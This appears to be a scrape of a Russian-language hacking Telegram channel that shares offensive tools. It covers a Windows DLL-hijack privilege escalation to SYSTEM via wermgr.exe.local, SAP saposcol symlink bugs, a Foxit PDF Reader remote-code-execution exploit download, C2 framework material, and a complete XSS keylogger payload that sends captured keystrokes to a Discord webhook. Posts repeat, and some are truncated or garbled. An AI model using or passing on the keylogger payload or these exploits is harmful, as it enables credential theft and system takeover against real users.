DirCreate2System
Получаем
Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.
*
DOWNLOAD POC
#windows #escpriv #POC #system
Получаем
NT AUTHORITY\\SYSTEM
*Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.
*
DOWNLOAD POC
#windows #escpriv #POC #system
👍5
Privilege Escalation Vulnerabilities (UNIX Insecure File Handling)
*
1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging
2. UNIX Symlink Following and Race Condition in Hardware Reporting
3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol
4. UNIX Symlink Following in Log File Creation of saposcol
5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol
#linux #privesc #sec
*
1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging
2. UNIX Symlink Following and Race Condition in Hardware Reporting
3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol
4. UNIX Symlink Following in Log File Creation of saposcol
5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol
#linux #privesc #sec
👍6
CVE-2022-28672_exploit.zip
16.3 KB
CVE-2022-28672
Foxit PDF Reader Remote Code Execution Exploit (NOT POC))))
Foxit PDF Reader Remote Code Execution Exploit (NOT POC))))
👍10🔥1
Атаки на web-приложения на JAVA
Это обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.
download
*
Bonus track
Jar Analyzer
GUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода.
download
#java #security #web #hack
Это обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.
download
*
Bonus track
Jar Analyzer
GUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода.
download
#java #security #web #hack
🔥5👍3
Оценка уязвимостей с помощью Nmap ?
Вам нужен Vultriever !
*
Из коробки Vultriever умеет:
Server IP address
Network port number
Network port status
Protocol used by the network port
Network service operating on the network port and its version
Vulnerability CVE-identifier
Vulnerability rating
URL-link to the denoscription of the vulnerability on the platform Vulners.com
Заказывайте прямо сейчас суникальной финкой лгбт
Download
Вам нужен Vultriever !
*
Из коробки Vultriever умеет:
Server IP address
Network port number
Network port status
Protocol used by the network port
Network service operating on the network port and its version
Vulnerability CVE-identifier
Vulnerability rating
URL-link to the denoscription of the vulnerability on the platform Vulners.com
Заказывайте прямо сейчас с
👍7🔥3😱3
Охота на C2 C&C сервера
Понимание работы и обнаружение фреймворков C2 (C&C)
*
1. Understanding & Detecting C2 Frameworks — TrevorC2
2. Understanding & Detecting C2 Frameworks — Ares
3. Understanding & Detecting C2 Frameworks — HARS (HTTP/S Asynchronous Reverse Shell)
4. Understanding & Detecting C2 Frameworks — BabyShark
*
BonusTrack:
Download BabyShark
#C2 #hackers #botnets
Понимание работы и обнаружение фреймворков C2 (C&C)
*
1. Understanding & Detecting C2 Frameworks — TrevorC2
2. Understanding & Detecting C2 Frameworks — Ares
3. Understanding & Detecting C2 Frameworks — HARS (HTTP/S Asynchronous Reverse Shell)
4. Understanding & Detecting C2 Frameworks — BabyShark
*
BonusTrack:
Download BabyShark
#C2 #hackers #botnets
🔥11😱2
XSS Payload - Discord Keylogger
usage:
usage:
<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>
#discord #xss🔥7👍6